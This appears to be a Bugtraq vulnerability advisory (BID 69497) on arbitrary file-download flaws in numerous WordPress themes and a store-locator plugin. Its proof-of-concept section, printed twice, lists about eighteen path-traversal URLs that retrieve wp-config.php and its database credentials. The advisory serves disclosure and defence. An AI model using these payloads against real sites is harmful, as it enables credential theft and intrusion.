Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
BID:69497
Info
Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
| Bugtraq ID: | 69497 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 01 2014 12:00AM |
| Updated: | Jan 06 2015 12:03AM |
| Credit: | Hugo Santiago |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
Multiple WordPress themes are prone to multiple arbitrary file-download vulnerabilities.
An attacker can exploit these issues to download arbitrary files from the web server and obtain potentially sensitive information.
Multiple WordPress themes are prone to multiple arbitrary file-download vulnerabilities.
An attacker can exploit these issues to download arbitrary files from the web server and obtain potentially sensitive information.
Exploit / POC
Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI's are available:
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
http://www.example.com/wp-content/force-download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
http://www.example.com/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/markant/download.php?file=../../wp-config.php
http://www.example.com/wp-content/themes/yakimabait/download.php?file=./wp-config.php
http://www.example.com/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
http://www.example.com/wp-content/themes/felis/download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
http://www.example.com/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/epic/includes/download.php?file=wp-config.php
http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
http://www.example.com/wp-content/themes/lote27/download.php?download=../../../wp-config.php
http://www.example.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
http://www.example.com/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
Attackers can use a browser to exploit these issues.
The following example URI's are available:
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
http://www.example.com/wp-content/force-download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
http://www.example.com/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/markant/download.php?file=../../wp-config.php
http://www.example.com/wp-content/themes/yakimabait/download.php?file=./wp-config.php
http://www.example.com/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
http://www.example.com/wp-content/themes/felis/download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
http://www.example.com/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/epic/includes/download.php?file=wp-config.php
http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
http://www.example.com/wp-content/themes/lote27/download.php?download=../../../wp-config.php
http://www.example.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
http://www.example.com/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
Solution / Fix
Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
References:
References: